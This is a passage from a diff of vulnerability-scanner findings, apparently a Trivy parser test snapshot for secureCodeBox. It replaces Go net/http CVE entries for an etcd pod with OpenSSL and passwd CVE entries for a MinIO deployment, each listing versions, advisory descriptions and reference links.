1.17.x before 1.17.5 allows uncontrolled memory consumption in the header canonicalization cache via HTTP/2 requests.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": undefined, - "name": "golang: net/http: limit growth of header canonicalization cache", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-44716", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-44716", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/50058", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://go.dev/cl/369794", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://go.dev/issue/50058", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-44716.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-0001.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0288", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220121-0002/", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-44716", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", - "foundIn": "Target: 'usr/local/bin/etcd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27664", - "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:2357", - "https://access.redhat.com/security/cve/CVE-2022-27664", - "https://bugzilla.redhat.com/2107371", - "https://bugzilla.redhat.com/2107374", - "https://bugzilla.redhat.com/2107383", - "https://bugzilla.redhat.com/2107386", - "https://bugzilla.redhat.com/2107388", - "https://bugzilla.redhat.com/2113814", - "https://bugzilla.redhat.com/2124669", - "https://bugzilla.redhat.com/2132868", - "https://bugzilla.redhat.com/2132872", - "https://bugzilla.redhat.com/2161274", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", - "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", - "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", - "https://errata.almalinux.org/9/ALSA-2023-2357.html", - "https://errata.rockylinux.org/RLSA-2022:7129", - "https://github.com/advisories/GHSA-69cg-p879-7622", - "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", - "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", - "https://github.com/golang/go/issues/54658", - "https://go.dev/cl/428735", - "https://go.dev/issue/54658", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-27664.html", - "https://linux.oracle.com/errata/ELSA-2023-2802.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", - "https://pkg.go.dev/vuln/GO-2022-0969", - "https://security.gentoo.org/glsa/202209-26", - "https://security.netapp.com/advisory/ntap-20220923-0004/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-27664", - ], - }, - "category": "Vulnerability", - "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": undefined, - "name": "handle server errors after sending GOAWAY", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27664", + "value": "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2357", + "value": "https://linux.oracle.com/cve/CVE-2022-4304.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27664", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107371", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107374", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107383", + "value": "https://ubuntu.com/security/notices/USN-5844-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107386", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4304", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107388", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0465", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-0465", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", + "https://linux.oracle.com/cve/CVE-2023-0465.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", + "https://security.netapp.com/advisory/ntap-20230414-0001/", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0465", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230328.txt", + ], + }, + "category": "Vulnerability", + "description": +"Applications that use a non-default option when verifying certificates may be +vulnerable to an attack from a malicious CA to circumvent certain checks. + +Invalid certificate policies in leaf certificates are silently ignored by +OpenSSL and other certificate policy checks are skipped for that certificate. +A malicious CA could use this to deliberately assert invalid certificate policies +in order to circumvent policy checking on the certificate altogether. + +Policy processing is disabled by default but can be enabled by passing +the \`-policy' argument to the command line utilities or by calling the +\`X509_VERIFY_PARAM_set1_policies()' function." +, + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "Invalid certificate policies in leaf certificates are silently ignored", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/2113814", + "value": "https://avd.aquasec.com/nvd/cve-2023-0465", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2124669", + "value": "https://access.redhat.com/security/cve/CVE-2023-0465", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132868", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132872", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "value": "https://linux.oracle.com/cve/CVE-2023-0465.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0465", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "value": "https://www.openssl.org/news/secadv/20230328.txt", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0466", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-0466", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", + "https://linux.oracle.com/cve/CVE-2023-0466.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", + "https://security.netapp.com/advisory/ntap-20230414-0001/", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0466", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230328.txt", + ], + }, + "category": "Vulnerability", + "description": +"The function X509_VERIFY_PARAM_add0_policy() is documented to +implicitly enable the certificate policy check when doing certificate +verification. However the implementation of the function does not +enable the check which allows certificates with invalid or incorrect +policies to pass the certificate verification. + +As suddenly enabling the policy check could break existing deployments it was +decided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy() +function. + +Instead the applications that require OpenSSL to perform certificate +policy check need to use X509_VERIFY_PARAM_set1_policies() or explicitly +enable the policy check by calling X509_VERIFY_PARAM_set_flags() with +the X509_V_FLAG_POLICY_CHECK flag argument. + +Certificate policy checks are disabled by default in OpenSSL and are not +commonly used by applications." +, + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "Certificate policy check not enabled", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "value": "https://avd.aquasec.com/nvd/cve-2023-0466", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "value": "https://access.redhat.com/security/cve/CVE-2023-0466", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "value": "https://linux.oracle.com/cve/CVE-2023-0466.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:7129", + "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69cg-p879-7622", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/54658", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://go.dev/cl/428735", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0466", }, { "type": "URL", - "value": "https://go.dev/issue/54658", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://www.openssl.org/news/secadv/20230328.txt", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-6755", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", + "references": [ + "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", + "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", + "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", + "http://rump2007.cr.yp.to/15-shumow.pdf", + "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", + "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", + "http://www.securityfocus.com/bid/63657", + "https://access.redhat.com/security/cve/CVE-2007-6755", + "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", + "https://www.cve.org/CVERecord?id=CVE-2007-6755", + "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", + ], + }, + "category": "Vulnerability", + "description": "The NIST SP 800-90A default statement of the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm contains point Q constants with a possible relationship to certain "skeleton key" values, which might allow context-dependent attackers to defeat cryptographic protection mechanisms by leveraging knowledge of those values. NOTE: this is a preliminary CVE for Dual_EC_DRBG; future research may provide additional details about point Q and associated attacks, and could potentially lead to a RECAST or REJECT of this CVE.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "Dual_EC_DRBG: weak pseudo random number generator", + "references": [ { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "value": "https://avd.aquasec.com/nvd/cve-2007-6755", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "value": "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", + "value": "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "value": "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "value": "http://rump2007.cr.yp.to/15-shumow.pdf", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "value": "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "value": "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0969", + "value": "http://www.securityfocus.com/bid/63657", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-26", + "value": "https://access.redhat.com/security/cve/CVE-2007-6755", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2007-6755", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "value": "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.7.0", - "foundIn": "Target: 'usr/local/bin/etcd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41723", - "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2010-0928", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41723", - "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - "https://go.dev/cl/468135", - "https://go.dev/cl/468295", - "https://go.dev/issue/57855", - "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", - "https://pkg.go.dev/vuln/GO-2023-1571", - "https://vuln.go.dev/ID/GO-2023-1571.json", - "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", + "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", + "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", + "http://www.osvdb.org/62808", + "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", + "https://access.redhat.com/security/cve/CVE-2010-0928", + "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", + "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", + "https://www.cve.org/CVERecord?id=CVE-2010-0928", ], }, "category": "Vulnerability", - "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "OpenSSL 0.9.8i on the Gaisler Research LEON3 SoC on the Xilinx Virtex-II Pro FPGA uses a Fixed Width Exponentiation (FWE) algorithm for certain signature calculations, and does not verify the signature before providing it to a caller, which makes it easier for physically proximate attackers to determine the private key via a modified supply voltage for the microprocessor, related to a "fault-based attack."", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "avoid quadratic complexity in HPACK decoding", + "name": "openssl: RSA authentication weakness", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41723", + "value": "https://avd.aquasec.com/nvd/cve-2010-0928", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41723", + "value": "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "value": "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", }, { "type": "URL", - "value": "https://go.dev/cl/468135", + "value": "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", }, { "type": "URL", - "value": "https://go.dev/cl/468295", + "value": "http://www.osvdb.org/62808", }, { "type": "URL", - "value": "https://go.dev/issue/57855", + "value": "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "value": "https://access.redhat.com/security/cve/CVE-2010-0928", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "value": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "value": "https://www.cve.org/CVERecord?id=CVE-2010-0928", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-5686", + "installedVersion": "1:4.8.1-1", + "packageName": "passwd", + "references": [ + "http://secunia.com/advisories/27215", + "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "http://www.securityfocus.com/bid/26048", + "http://www.vupen.com/english/advisories/2007/3474", + "https://issues.rpath.com/browse/RPL-1825", + ], + }, + "category": "Vulnerability", + "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "value": "https://avd.aquasec.com/nvd/cve-2007-5686", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "value": "http://secunia.com/advisories/27215", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1571", + "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", }, { "type": "URL", - "value": "https://vuln.go.dev/ID/GO-2023-1571.json", + "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "value": "http://www.securityfocus.com/bid/26048", + }, + { + "type": "URL", + "value": "http://www.vupen.com/english/advisories/2007/3474", + }, + { + "type": "URL", + "value": "https://issues.rpath.com/browse/RPL-1825", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.4.0", - "foundIn": "Target: 'usr/local/bin/etcd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41717", - "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4235", + "installedVersion": "1:4.8.1-1", + "packageName": "passwd", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2367", - 